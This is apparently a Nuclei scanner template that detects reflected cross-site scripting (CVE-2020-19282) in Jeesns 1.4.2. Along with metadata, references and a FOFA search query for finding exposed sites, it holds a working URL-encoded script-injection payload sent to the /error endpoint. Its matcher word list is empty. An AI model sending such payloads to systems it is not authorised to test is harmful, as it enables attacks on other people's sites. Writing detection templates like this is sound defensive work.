id: CVE-2020-19282 info: name: Jeesns 1.4.2 - Cross-Site Scripting author: pikpikcu severity: medium description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/zchuanzhao/jeesns/issues/11 - https://www.seebug.org/vuldb/ssvid-97940 - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-19282 cwe-id: CWE-79 epss-score: 0.00135 epss-percentile: 0.48691 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeesns product: jeesns fofa-query: title="jeesns" tags: cve2020,cve,jeesns,xss http: - method: GET path: - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100ec03ccaf8d59fb6b4355b6188f4cecad9817f38ce889c7ed6046257af6e24b38022100c88ef66de3fb9773d33608a6df27e242486e0571ebdc0fc6fea38832eeb9a01a:922c64590222798bb761d5b6d8e72950